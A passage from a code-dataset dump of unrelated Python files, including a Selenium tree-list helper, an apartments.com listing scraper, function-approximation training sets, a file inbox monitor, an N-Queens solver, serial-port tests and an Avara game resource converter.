self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'li[role=\"treeitem\"]')),\n 'There is no option in treelist {}'.format(self.pop_up_name))\n self.list = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'span[class=\"k-in\"]')),\n 'There is no option in treelist {}'.format(self.pop_up_name))\n\n def choose_all_options(self):\n for el in self.list:\n el.click()\n self.close_widget_window()\n return self\n\n def choose_option_by_index(self, list_of_index):\n try:\n for index in list_of_index:\n self.list[index].click()\n except IndexError:\n print('There is no element with index ' + str(list_of_index))\n self.close_widget_window()\n return self\n\n def select_list_of_webelements_from_tree_by_names(self, list_of_names):\n '''Select assortment items from the tree according to assortment names'''\n\n for name in list_of_names:\n assortment_xpath = \"//ul[@class='k-group k-treeview-lines']//span[./text()= '%s']\" % name\n el_list = WebDriverWait(self.pop_up, 5).until(EC.presence_of_element_located((By.XPATH,\n assortment_xpath)), 'Assortment is absent')\n el_list.click()\n\n def open_base_treeitem(self, index):\n expand_icon = WebDriverWait(self.list_rows[index], 5).until(EC.visibility_of_element_located(self.expand_icon),\n 'Category has not child items')\n expand_icon.click()\n nested_group = WebDriverWait(self.list_rows[index], 5).until(EC.visibility_of_element_located(self.nested_group),\n 'Category has not child items')\n return nested_group\n\n def choose_all_options_from_nested_group(self, nested_group_element):\n nested_list = WebDriverWait(nested_group_element, 5).until\\\n (EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'span[class=\"k-in\"]')),\n 'There is no option in nested treelist {}'.format(self.pop_up_name))\n for el in nested_list:\n el.click()\n self.close_widget_window()\n return self\n\n def choose_option_by_index_from_nested_group(self, nested_group_element, list_of_index):\n nested_list = WebDriverWait(nested_group_element, 5).until\\\n (EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'span[class=\"k-in\"]')),\n 'There is no option in nested treelist {}'.format(self.pop_up_name))\n try:\n for index in list_of_index:\n nested_list[index].click()\n except IndexError:\n print('There is no element with index ' + str(list_of_index) + ' in nested group')\n self.close_widget_window()\n return self\n\n\n\n","sub_path":"utilities/TreeListPopUp.py","file_name":"TreeListPopUp.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12834253","text":"\"\"\"Parse an apartments.com search result page and export to CSV.\"\"\"\n\nimport csv\nimport json\nimport sys\nimport datetime\nimport requests\nimport os\nimport traceback\nfrom bs4 import BeautifulSoup\nimport parse_apartments as parsing\nfrom output_formatter import OutputFile\nimport logging\n\n# Config parser was renamed in Python 3\ntry:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\n\ndef scrapeApartments(out, search_urls, max_pages, ignore_duplicates, config):\n \"\"\"goes through each apartment search page URL and scrapes the data\"\"\"\n # parse current entire apartment list including pagination for all search urls\n apartments = [] #List of visited apartment URLs to avoid duplicate entries\n for url in search_urls:\n url = url.strip()\n if not url.endswith('/'):\n url = url + '/'\n scrapeSearchPage(out, url, 1, max_pages, ignore_duplicates, apartments, config)\n\n\ndef scrapeSearchPage(out, page_url, page_num, max_pages, ignore_duplicates, apartmentList, config):\n \"\"\"Given the current page URL, extract the information from each apartment in the list\"\"\"\n url = page_url\n metadata = url.find('?')\n if metadata > -1:\n url = url[:metadata] + str(page_num) + \"/\" + url[metadata:]\n else:\n if not url.endswith(\"/\"):\n url += \"/\"\n url += str(page_num) + \"/\"\n\n logging.info(\"Now getting apartments from page \" + str(page_num) + \": %s\" % url)\n\n # read the current page\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n page = requests.get(url, headers=headers)\n \n # soupify the current page\n soup = BeautifulSoup(page.content, 'html.parser')\n soup.prettify()\n\n # get the element that contains the apartment list\n soup = soup.find('div', class_='placardContainer')\n\n # append the current apartments to the list\n for item in soup.find_all('article', class_='placard'):\n data_url = item.get('data-url')\n if data_url is None: \n continue\n\n # get the name for user/debug info\n name = \"N/A\"\n obj = item.find('span', class_='js-placardTitle')\n if obj is not None:\n name = obj.getText().strip()\n\n if ignore_duplicates and (data_url in apartmentList):\n logging.info('Skipping duplicate: %s' % name)\n continue\n\n #Take note of the url so we don't accidently create a duplicate entry later\n apartmentList.append(data_url)\n\n #print some user/debug info\n logging.info(\"Collecting data for: %s\" % name)\n\n #request the page and parse the data\n apartmentPage = requests.get(data_url, headers=headers)\n apartmentSoup = BeautifulSoup(apartmentPage.content, 'html.parser')\n apartmentSoup.prettify()\n parsing.parseApartmentPage(apartmentSoup, out, data_url, config)\n\n # recurse until the last page\n if page_num < max_pages:\n scrapeSearchPage(out, page_url, page_num + 1, max_pages, ignore_duplicates, apartmentList, config)\n\ndef loadConfigFromValuesNoCase(conf, key, values):\n \"\"\"NOTE: The values must all be lowercase (e.x. \\\"highest\\\")\"\"\"\n value = conf.get('all', key).lower()\n if value in values:\n return value\n else:\n raise Exception(\"ERROR: Configuration \\'\" + key + \"\\' was an invalid value, unable to run!\")\n\ndef main():\n \"\"\"Read from the config file\"\"\"\n trueValues = ['T', 't', '1', 'True', 'true']\n priceSelectorValues = ['lowest', 'highest', 'average']\n\n conf = configparser.ConfigParser()\n config_file = os.path.join(os.path.dirname(__file__), \"config.ini\")\n conf.read(config_file)\n\n # get the apartments.com search URL(s)\n apartments_url_config = conf.get('all', 'apartmentsURL')\n urls = apartments_url_config.replace(\" \", \"\").split(\",\")\n\n #get max page numbers\n max_pages_config = conf.get('all', 'maxPageScrape')\n max_pages = 1\n try:\n max_pages = int(max_pages_config)\n except ValueError:\n max_pages = 1\n\n #get ignore duplicates config\n ignore_duplicates = conf.get('all', 'ignoreDuplicates') in trueValues\n\n #get other configs\n config = {}\n config['separateUtilities'] = (conf.get('all', 'separateUtilities') in trueValues)\n config['separatePets'] = (conf.get('all', 'separatePets') in trueValues)\n config['separateParking'] = (conf.get('all', 'separateParking') in trueValues)\n config['priceSelector'] = loadConfigFromValuesNoCase(conf, 'priceSelector', priceSelectorValues)\n config['priceAdjustment'] = (conf.get('all', 'priceAdjustment') in trueValues)\n config['adjustPrice'] = {\n \"Air Conditioning\": int(conf.get('all', 'adjustACPrice')),\n \"Electric\": int(conf.get('all', 'adjustElectricPrice')),\n \"Gas\": int(conf.get('all', 'adjustGasPrice')),\n \"Heat\": int(conf.get('all', 'adjustHeatPrice')),\n \"Sewage\": int(conf.get('all', 'adjustSewagePrice')),\n \"Trash\": int(conf.get('all', 'adjustTrashPrice')), \n \"Water\": int(conf.get('all', 'adjustWaterPrice')),\n \"Other\": int(conf.get('all', 'adjustOtherPrice'))\n }\n #Make sure if there are utilities not listed that we add default values\n for util in OutputFile.values['utilities']:\n if util not in config['adjustPrice']:\n config['adjustPrice'][util] = 0\n\n # get the name of the output file\n fname = conf.get('all', 'fname')\n\n #Attempt to remove old output file to make sure we have write permissions\n try:\n os.remove(fname + \".xlsx\")\n except PermissionError:\n logging.error(\"The output file is being used by another process. Try closing the file then run the program again: \\'\" + fname + \".xlsx\\'\")\n return\n except FileNotFoundError:\n #We don't actually care about this error, we can ignore it.\n pass\n\n #Create the output file and start the scraping\n out = OutputFile(fname, config)\n try:\n scrapeApartments(out, urls, max_pages, ignore_duplicates, config)\n except Exception:\n logging.exception(\"An error has occured!\")\n finally:\n out.close()\n logging.info(\"Finished\")\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, handlers=[\n logging.FileHandler(filename='logging.log'),\n logging.StreamHandler(sys.stdout)\n ])\n main()\n","sub_path":"scrape_apartments.py","file_name":"scrape_apartments.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"536112765","text":"\"\"\"\nThis module contains a function that returns training set for functions to approximate\n\"\"\"\n\nimport random\nimport numpy as np\n\nfrom varro.algo.problems import Problem\n\n\ndef rastrigin(x):\n \"\"\"Rastrigin function\n\n Args:\n x (list): Input list\n\n Returns:\n Outputs of the rastrigin function given the inputs\n \"\"\"\n x = np.asarray_chkfinite(x)\n n = len(x)\n return 10*n + np.sum(x**2 - 10 * np.cos( 2 * np.pi * x))\n\ndef rosenbrock(x):\n \"\"\"Rosenbrock function\n\n Args:\n x (list): Input list\n\n Returns:\n Outputs of the rosenbrock function given the inputs\n \"\"\"\n x = np.asarray_chkfinite(x)\n x0 = x[:-1]\n x1 = x[1:]\n return (np.sum( (1 - x0) **2 ) + 100 * np.sum( (x1 - x0**2) **2 ))\n\nclass ProblemFuncApprox(Problem):\n def __init__(self, func):\n # Set seed\n random.seed(100)\n\n # Choose classification or regression\n self._approx_type = Problem.REGRESSION\n self._name = func\n self._input_dim = 1\n self._output_dim = 1\n\n # Set the X_train and y_train for function to approximate\n self.reset_train_set()\n\n def sample_float(self, start, end, step, size=500):\n \"\"\"Gets a random list of floats from a range of floats\n\n Args:\n start (float): The lower bound of our range\n end (float): The upper bound of our range\n step (float): The precision of our floats to be sampled\n size (int): Number of floats to sample from list\n\n Returns:\n A random sample of floats from the list\n \"\"\"\n self.minimum = start\n self.maximum = end\n return random.sample(list(np.arange(start, end, step)), k=size)\n\n def sample_int(self, start, end, size=500):\n \"\"\"Gets a random list of ints from a range of ints\n\n Args:\n start (int): The lower bound of our range (inclusive)\n end (int): The upper bound of our range (exclusive)\n size (int): Number of ints to sample from list\n\n Returns:\n A random sample of ints from the list\n \"\"\"\n self.minimum = start\n self.maximum = end\n return np.random.randint(start, end, size=size)\n\n def sample_bool(self, size=500):\n \"\"\"Gets a random list of bools, with the same number of 1's and 0's\n\n Args:\n size (int): Number of bools to sample\n\n Returns:\n A random sample of bools from the list\n \"\"\"\n self.minimum = 0\n self.maximum = 1\n sample = np.concatenate((np.zeros(size//2, dtype=np.int8), np.ones(size//2, dtype=np.int8)))\n np.random.shuffle(sample)\n return sample\n\n def reset_train_set(self):\n \"\"\"Sets the ground truth training input X_train and output y_train\n for the function specified to approximate\n\n \"\"\"\n func = self._name\n if func == 'sin':\n self.X_train = self.sample_float(-2*np.pi, 2*np.pi, 0.001)\n self.y_train = np.sin(self.X_train)\n elif func == 'sin:int12':\n self.X_train = self.sample_int(0, 2^12, size=40)\n X_unscaled = np.copy(self.X_train).astype(float)\n X_unscaled *= 2*np.pi / float(2^12)\n self.y_train = np.sin(self.X_train)\n elif func == 'cos':\n self.X_train = self.sample_float(-2*np.pi, 2*np.pi, 0.001)\n self.y_train = np.cos(self.X_train)\n elif func == 'tan':\n self.X_train = self.sample_float(-2*np.pi, 2*np.pi, 0.001)\n self.y_train = np.tan(self.X_train)\n elif func == 'x':\n self.X_train = self.sample_float(-10, 10, 0.001)\n self.y_train = self.X_train\n elif func == 'ras':\n self.X_train = self.sample_float(-5.12, 5.12, 0.01)\n self.y_train = rastrigin(self.X_train)\n elif func == 'rosen':\n self.X_train = self.sample_float(-10, 10, 0.001)\n self.y_train = rosenbrock(self.X_train)\n elif func == 'step':\n self.X_train = self.sample_float(-10, 10, 0.001)\n self.y_train = (np.array(self.X_train) > 0).astype(float)\n elif func == 'simple_step':\n self.X_train = self.sample_bool(size=40)\n self.y_train = self.X_train\n else:\n raise ValueError('Problem \\'' + str(func) + '\\' not recognised')\n","sub_path":"varro/algo/problems/func_approx.py","file_name":"func_approx.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176789961","text":"import sys\nimport time\nimport os\nimport datetime\n\n\nclass InboxFile:\n\n def __init__(self, path=\"\", fileName=\"\"):\n\n fileName, fileExt = os.path.splitext(fileName)\n self.filePath = path\n self.fileName = fileName\n self.fileExt = fileExt\n\n self.datetime = None\n self.fileType = None\n\n\n def exists(self):\n \"\"\"\n \"\"\"\n if not os.path.isfile(os.path.join(self.filePath, self.fileName + \\\n self.fileExt)):\n\n print(self.fileName + self.fileExt + \" does not exist.\")\n return False\n\n return True\n\n\n def findDatetimeAndType(self, format_dict):\n \"\"\"\n \"\"\"\n\n for f in format_dict.keys():\n try:\n d = datetime.datetime.strptime(self.fileName, format_dict[f])\n self.datetime = d\n self.fileType = f\n return True\n except ValueError as err:\n pass\n\n return False\n\n\n def renameFile(self, format_dict):\n \"\"\"\n \"\"\"\n\n if self.exists():\n\n if self.datetime is None:\n print('Unable to rename file because self.datetime is None')\n else:\n fileName_new = self.datetime.strftime(format_dict[self.fileType])\n item_new = fileName_new + self.fileExt\n\n src = os.path.join(self.filePath, self.fileName + self.fileExt)\n dst = os.path.join(self.filePath, fileName_new + self.fileExt)\n\n\n if os.path.isfile(dst):\n print('file ' + item_new + ' already exists. Did not rename the file.')\n\n else:\n os.rename(src, dst)\n print('file ' + self.fileName + self.fileExt + ' renamed as ' + item_new + '.')\n self.fileName = fileName_new\n\n\n def createTextFile(self):\n\n if self.exists():\n textFile = os.path.join(self.filePath, self.fileName + '.txt')\n if not os.path.isfile(textFile):\n open(textFile, 'a').close()\n\n print(textFile + ' created.')\n\n\n\n def archiveFile(self, path_to_archive):\n\n # create and make sure destination path exists\n p = os.path.join(path_to_archive, str(self.d.year), \\\n str(self.d.month), str(self.d.day))\n if not os.path.exists(p):\n os.makedirs(p)\n\n # move file\n src = os.path.join(self.path, self.fileName + self.fileExt)\n dst = os.path.join(path_to_archive, self.fileName + self.fileExt)\n\n if os.path.isfile(dst):\n print('file ' + dst + ' already exists. Did not move the file.')\n\n else:\n os.rename(src, dst)\n\n print('file ' + src + ' moved to ' + dst + '.')\n\n\n\n\n\ndef monitor_directory(inbox, archive, receipts_archive, image_archive, \\\n inbox_formats, storage_formats):\n \"\"\"\n\n\n \"\"\"\n\n\n # inbox\n contents = os.listdir(inbox)\n for item in contents:\n\n inboxItem = InboxFile(inbox, item)\n\n # Rename file\n if inboxItem.findDatetimeAndType(inbox_formats):\n inboxItem.renameFile(storage_formats)\n\n # Create text file\n if inboxItem.findDatetimeAndType(storage_formats):\n inbox.createTextFile()\n\n # # archive\n # contents = os.listdir(archive)\n # for item in contents:\n # inboxItem = InboxFile(inbox, item)\n\n # if inboxItem.exists:\n # inboxItem\n\n\n\n\n\n\n\n # # archive\n # contents = os.listdir(archive)\n # for item in contents:\n # fileName, fileExtension = os.path.splitext(item)\n\n # # determine file type\n # ftype = format_to_type(fileName)\n\n # # receipt-genius-scans\n # if (ftype == 'receipt-general') and (fileExtension == '.pdf'):\n\n # item_pdf = item\n # item_txt = fileName + '.txt'\n\n # if os.path.isfile(os.path.join(archive, item_txt)):\n\n # archive_file(archive, receipts_archive,\n # storage_formats[ftype], item_pdf)\n\n # archive_file(archive, receipts_archive,\n # storage_formats[ftype], item_txt)\n\n # else:\n\n # print('text file ' + str(item_txt) + 'does not exist. \\\n # Did not archive this file.')\n\n # # statement\n # if ((ftype == 'statement-citi') or \n # (ftype == 'statement-pnc') or\n # (ftype == 'statement-ing') or\n # (ftype == 'statement-fnbk')) and (fileExtension == '.pdf'):\n\n # item_pdf = item\n\n # archive_file(archive, receipts_archive,\n # storage_formats[ftype], item_pdf)\n\n # # image\n # if (ftype == 'image') and (fileExtension == '.jpg'):\n\n # item_jpg = item\n # item_txt = fileName + '.txt'\n\n # if os.path.isfile(os.path.join(archive, item_txt)):\n\n # archive_file(archive, image_archive,\n # storage_formats[ftype], item_jpg)\n\n # archive_file(archive, image_archive,\n # storage_formats[ftype], item_txt)\n\n # else:\n\n # print('text file ' + str(item_txt) + 'does not exist. \\\n # Did not archive this file.')\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\n inbox = \"/media/elements/inbox/\"\n archive = \"/media/elements/inbox/archive/\"\n receipts_archive = \"/media/elements/archive/receipts/\"\n image_archive = \"/media/elements/Media/Pictures/\"\n\n\n inbox_formats = {\n 'receipt-genius-scan' : '%m-%d-%Y %I-%M %p',\n 'image-phone' : 'IMG_%Y%m%d_%H%M%S',\n 'panorama-phone' : 'PANO_%Y%m%d_%H%M%S',\n 'statement-citi' : '%m-%d-%Y-citi',\n 'statement-pnc' : '%m-%d-%Y-pnc',\n 'statement-ing' : '%m-%d-%Y-ing',\n 'statement-fnbk' : '%m-%d-%Y-fnbk',\n }\n\n storage_formats = {\n 'receipt-genius-scan' : '%Y%m%d_%H%M%S',\n 'image-phone' : '%Y%m%d_%H%M%S',\n 'panorama-phone' : '%Y%m%d_%H%M%S',\n 'statement-citi' : '%Y%m%d_%H%M%S_citi',\n 'statement-pnc' : '%Y%m%d_%H%M%S_pnc',\n 'statement-ing' : '%Y%m%d_%H%M%S_ing',\n 'statement-fnbk' : '%Y%m%d_%H%M%S_fnbk',\n 'generic' : '%Y%m%d_%H%M%S'\n }\n\n while true:\n monitor_directory(inbox, archive, receipts_archive, image_archive, \\\n inbox_formats, storage_formats)\n time.sleep(300)","sub_path":"inbox_monitor/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23869891","text":"class Solution(object):\n def totalNQueens(self, n):\n result_list = []\n def dfs(queen_list, check1_list, check2_list):\n row = len(queen_list)\n if row == n:\n result = ['.' * k + 'Q' + '.' * (n - 1 - k) for k in queen_list]\n result_list.append(result)\n return\n for i in range(n):\n if i in queen_list or row - i in check1_list or row + i in check2_list: \n continue\n new_queen_list = queen_list + [i]\n new_check1_list = check1_list + [row - i]\n new_check2_list = check2_list + [row + i]\n dfs(new_queen_list, new_check1_list, new_check2_list)\n dfs([], [], [])\n return len(result_list)\n \n \nif __name__ == '__main__':\n solution = Solution()\n result = solution.totalNQueens(4)\n print(result)","sub_path":"01_LeetCode/0052/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413575711","text":"#!/usr/bin/python3\r\n'''\r\nThe defaultdict tool is a container in the collections class of Python. \r\nIt's similar to the usual dictionary (dict) container, but it has one difference: \r\nThe value fields' data type is specified upon initialization. \r\n\r\n\r\n a Python dictionary throws a KeyError if you try to get an item with a key that is not currently \r\nin the dictionary. The defaultdict in contrast will simply create any items that you try to \r\naccess (provided of course they do not exist yet). i\r\n\r\ndefaultdict means that if a key is not found in the dictionary, then instead of a KeyError being \r\nthrown, a new entry is created. The type of this new entry is given by the argument of defaultdict\r\n'''\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\nd=defaultdict(list) # THE VALUES OF THE DICT WILL BE LIST\r\n\r\nd['anandam'].append('E1001')\r\nd['grande'].append('E1101')\r\nd['sobha'].append('2094')\r\nd['sobha'].append('6052')\r\nd['prestige'].append('8051')\r\nd['prestige'].append('8133')\r\n\r\nfor i in d:\r\n print (i,':', d[i])\r\n\r\nprint ('keys of defaultdict:=',d.keys())\r\nprint ('Values of defaultdict:=',d.values())\r\nprint ('TYpe of defaultdict:-',type(d))\r\nprint ('*' * 40)\r\n\r\n\r\nd1=defaultdict(int) # THE VALUES OF THE DICT ARE INT\r\nfor i in range(10):\r\n d1[i] = i+i\r\n\r\nprint ('*' * 40)\r\n\r\nprint ('keys of defaultdict:=',d1.keys())\r\nprint ('Values of defaultdict:=',d1.values())\r\nprint ('TYpe of defaultdict:-',type(d1))\r\n\r\nprint ('*' * 40)\r\n\r\n# FOLLOWING CODE WILL GIVE KEYERROR, AS FOR THE \\\r\n# KEY DOESNT EXIST, WE CANT INITIALIZE ITS VALUE\r\ndel d\r\nd={}\r\ntry:\r\n \r\n d['anandam'].append('E1001')\r\n d['grande'].append('E1101')\r\n d['sobha'].append('2094')\r\n d['sobha'].append('6052')\r\n d['prestige'].append('8051')\r\n d['prestige'].append('8133')\r\n print ('keys of defaultdict:=',d.keys()) # THIS WILL THROW KEYERROR\r\n print ('Values of defaultdict:=',d.values())\r\nexcept:\r\n print ('DICT ERROR')\r\n","sub_path":"defaultdict_usuage.py","file_name":"defaultdict_usuage.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165810639","text":"# coding: utf-8\nimport unittest\n\nimport os\nimport serial\nimport time\n\n\nclass _TestRS232_Base(unittest.TestCase):\n port = None\n\n def setUp(self):\n assert self.port is not None\n self.ser = serial.Serial(self.port, 19200, timeout=3)\n self.ser.flush()\n self.ser.flushInput()\n self.ser.flushOutput()\n\n def test_echo(self):\n time.sleep(200E-3)\n data_to_write = '1234\\n'\n\n self.ser.write(data_to_write)\n self.ser.flush()\n time.sleep(1)\n data = self.ser.readline()\n self.ser.close()\n\n self.assertEqual(data, data_to_write, \" %s RS232 ERROR\\nTransmitted %s\\nReceived: %s\" % (self.port, data_to_write, data))\n\n def tearDown(self):\n self.ser.close()\n\nclass TestRS232Front(_TestRS232_Base):\n port = '/dev/ttyNSC2'\n\nclass TestRS232Back(_TestRS232_Base):\n port = '/dev/ttyNSC3'\n\n\n\n\n\nif __name__ == '__main__':\n suite = unittest.TestSuite()\n\n suite.addTest(unittest.makeSuite(TestRS232Back))\n suite.addTest(unittest.makeSuite(TestRS232Front))\n\n\n\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\n","sub_path":"examples/test_suite/kmon_func_test/rs232.py","file_name":"rs232.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"576463516","text":"#!/usr/bin/env python3\nfrom pict2svg import parse_pict, PictParseError\nfrom rsrc_tools import resource\nimport rsrc_tools.tmpl.reader as tmplReader\nimport rsrc_tools.bspt.reader as bsptReader\nimport os\nimport sys\nimport json\nimport subprocess\nimport time\nfrom pathlib import Path\n\nBSPS_DIR = \"bsps\"\nHSND_DIR = \"snd\"\nSVG_DIR = \"svg\"\n\nDEBUG_EXPORT = True\n\nEXPORT_SOUND = True\n\n\ndef is_exe(path):\n return os.path.isfile(path) and os.access(path, os.X_OK)\n\nif not is_exe(os.path.join(\"build\", \"hsnd2wav\")) and \\\n not is_exe(os.path.join(\"build\", \"hsnd2wav.exe\")):\n EXPORT_SOUND = False\n\nWAV2OGG = False\nfor path in os.environ[\"PATH\"].split(os.pathsep):\n bin_file = os.path.join(path, \"sndfile-convert\") \n exe_file = bin_file + \".exe\"\n if is_exe(exe_file) or is_exe(bin_file):\n WAV2OGG = True\n\ndef parse_level_rsrc(rpath, outpath, tmpl=None):\n manifest_data = {}\n data = open(str(rpath), 'rb').read()\n\n reader = resource.Reader()\n try:\n rsrc = reader.parse(data)\n except:\n return (None, None)\n\n if tmpl is not None:\n rsrc['TMPL'] = tmpl\n try:\n tmplData = tmplReader.parse(rsrc)\n except:\n print(f\"Failed parsing TMPL for {rpath}\")\n return (None, None)\n if 'LEDI' not in tmplData:\n print(f\"No LEDI in file {rpath}\")\n return (None, None)\n\n # avara reads the LEDI #128\n set_ledi = tmplData['LEDI'][128]\n set_tag = set_ledi[\"Set Tag\"]\n\n # the key for the list of levels is\n # five asterisks\n ledi_meta = {}\n for single_ledi in set_ledi[\"*****\"]:\n # store these in a dictionary by pict name\n ledi_meta[single_ledi[\"Path\"]] = single_ledi\n\n #rsrc = get_forks(data)\n print(rsrc.keys())\n if 'LEDI' not in rsrc:\n print(\"No LEDI found for set %s\" % rpath)\n return\n\n ledi = rsrc['LEDI']\n\n dirname = rpath.name.split('.')[0]# + \"_svg\"\n dirpath = os.path.join(outpath, dirname)\n os.makedirs(dirpath, exist_ok=True)\n\n logpath = os.path.join(dirpath, \"log.txt\")\n sys.stdout = open(logpath, \"w\")\n\n svgdir = os.path.join(dirpath, SVG_DIR)\n os.makedirs(svgdir, exist_ok=True)\n\n if 'PICT' in rsrc:\n print(rsrc['PICT'].keys())\n picts = rsrc['PICT']\n for pict in picts:\n name = picts[pict][\"name\"]\n # make sure we have an LEDI for this\n if name not in ledi_meta:\n print(\"%s is not in LEDI, skipping\" % name)\n continue\n\n meta = ledi_meta[name]\n data = picts[pict][\"data\"]\n # print(data)\n \n filename = (\"%s_%s.svg\" % (str(pict), name)).replace(\" \", \"_\")\n\n if DEBUG_EXPORT:\n print(pict)\n print(name)\n print(filename)\n #print(meta[\"Name\"].encode('macintosh'))\n #print(meta[\"Message\"].encode('macintosh'))\n ledi_meta[name][\"Svg\"] = filename\n fn = os.path.join(svgdir, filename)\n # if os.path.isfile(fn):\n # print(\"%s was found, skipping\" % fn)\n # continue\n try:\n xml_text = parse_pict(fn, data)\n except PictParseError:\n print(F\"Could not parse {fn} - {meta['Name']} because of unknown opcode\")\n continue\n try:\n with open(fn, \"w\", encoding=\"utf-8\") as xml_file:\n xml_file.write(xml_text.decode(\"utf-8\"))\n except:\n print(f\"Couldn't write {fn}, probably because it is stupid\")\n\n manifest_data[\"LEDI\"] = {v[\"Tag\"]:v for (_, v) in ledi_meta.items()}\n\n if 'BSPT' in rsrc:\n bspt_meta = {}\n bspdir = os.path.join(dirpath, BSPS_DIR)\n os.makedirs(bspdir, exist_ok=True)\n bsps = bsptReader.parse(rsrc['BSPT'])\n for bsp in bsps:\n #filename = \"%d_%s.avarabsp.json\" % (bsp.res_id, bsp.name)\n filename = F\"{bsp.res_id}.json\"\n fn = os.path.join(bspdir, filename)\n if DEBUG_EXPORT:\n print(\"Writing BSPT %s\" % fn)\n with open(fn, \"w\") as bsp_file:\n bsp_file.write(bsp.avara_format())\n bspt_meta[bsp.res_id] = {\n \"name\": bsp.name,\n \"file\": fn\n }\n manifest_data[\"BSPT\"] = bspt_meta\n\n if 'HSND' in rsrc and EXPORT_SOUND:\n hsnd_meta = {}\n snddir = os.path.join(dirpath, HSND_DIR)\n os.makedirs(snddir, exist_ok=True)\n for hsnd_id in rsrc['HSND'].keys():\n hsnd_name = rsrc['HSND'][hsnd_id][\"name\"]\n\n fn = str(hsnd_id) + \"_\" + \"\".join(c for c in hsnd_name if c.isalnum() or c in ('.', '_')).rstrip()\n wavpath = os.path.join(snddir, fn + \".wav\")\n if DEBUG_EXPORT:\n print(f\"Found HSND {hsnd_id} {hsnd_name} {fn}\")\n\n args = [f'build{os.path.sep}hsnd2wav', str(hsnd_id), wavpath, str(rpath)]\n print(args)\n popen = subprocess.Popen(args, stdout=subprocess.PIPE)\n popen.wait()\n\n if WAV2OGG:\n oggpath = os.path.join(snddir, fn + \".ogg\")\n args = ['sndfile-convert', '-vorbis', wavpath, oggpath]\n popen = subprocess.Popen(args, stdout=subprocess.PIPE)\n popen.wait()\n try:\n os.remove(wavpath)\n except FileNotFoundError:\n pass\n\n\n hsnd_meta[hsnd_id] = {\n \"name\": hsnd_name,\n \"file\": wavpath if not WAV2OGG else oggpath\n }\n\n if 'TEXT' in rsrc:\n txts = \"\".join({k:v[\"data\"].decode(\"macroman\") for (k,v) in rsrc[\"TEXT\"].items()}.values())\n txtpath = os.path.join(dirpath, \"default.avarascript\")\n with open(txtpath, \"w\", encoding=\"utf-8\") as txtfile:\n txtfile.write(txts.replace(\"\\r\", \"\\n\"))\n\n \n if 'HULL' in rsrc:\n manifest_data[\"HULL\"] = tmplData[\"HULL\"]\n\n manifest_path = os.path.join(dirpath, \"set.json\")\n manifest_data[\"manifest_path\"] = manifest_path\n\n with open(manifest_path, 'w') as manifest_file:\n json.dump(manifest_data, manifest_file, indent=1)\n sys.stdout.close()\n return set_tag, manifest_data\n\n\n\n\nif __name__ == '__main__':\n\n if not EXPORT_SOUND:\n print(\"hsnd2wav is not built! I need this to export sound.\")\n print(\"build it with `make hsnd2wav`\")\n exit(1)\n\n if not WAV2OGG:\n print(\"I need libsndfile available to convert WAV to OGG.\")\n print(\"Install libsndfile and make sure sndfile-convert is on your PATH\")\n\n ldir = \"levels\"\n\n avara_r = os.path.join(\"levels\", \"single-player.r\")\n data = open(avara_r, 'rb').read()\n\n reader = resource.Reader()\n avara_rsrc = reader.parse(data)\n avara_tmpl = avara_rsrc['TMPL']\n\n sys.stdout = open(\"rsrc2files.log\", \"w\")\n if len(sys.argv) > 1:\n parse_level_rsrc(Path(sys.argv[1]), ldir, avara_tmpl)\n else:\n # run against everything in levels\n # and store them alongside\n manifest = {}\n for rsrc_file in os.listdir(ldir):\n rpath = os.path.join(ldir, rsrc_file)\n if DEBUG_EXPORT:\n print(rpath)\n if os.path.isdir(rpath):\n continue\n if not str(rpath).endswith(\".r\"):\n continue\n tag, manifest_data = parse_level_rsrc(Path(rpath), ldir, avara_tmpl)\n sys.stdout = open(\"rsrc2files.log\", \"a\")\n if not tag:\n print(f\"Couldn't read {rpath}\")\n continue\n manifest[tag] = manifest_data[\"manifest_path\"]\n\n manifest_path = os.path.join(ldir, \"manifest.json\")\n with open(manifest_path, 'w') as manifest_file:\n json.dump(manifest, manifest_file, indent=1)","sub_path":"bin/rsrc2files.py","file_name":"rsrc2files.py","file_ext":"py","file_size_in_byte":7796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115423361","text":"#from Waterloo's CCC Contest:\r\ndef arrivaltime(a):\r\n x = a.split(\":\")\r\n hourmin = []\r\n for each in x:\r\n p = int(each)\r\n hourmin.append(p)\r\n print(hourmin)\r\n if hourmin[0] not in range(7,11) and hourmin[0] not in range(15,20) and hourmin[0]+2 not in range(8,11) and hourmin[0]+2 not in range(16,20):\r\n arrival_hrs = hourmin[0]+2\r\n if hourmin[1] == 0:\r\n print(str(arrival_hrs) + \":\" + str(hourmin[1]) + \"0\")\r\n elif hourmin[0]+2 == 7 or hourmin[0]+2 == 15 and hourmin[1] > 0:\r\n if hourmin[1]*2 < 60:\r\n print(str(arrival_hrs) + \":\" + str(hourmin[1]*2))\r\n else:\r\n d = arrival_hrs+1\r\n e = 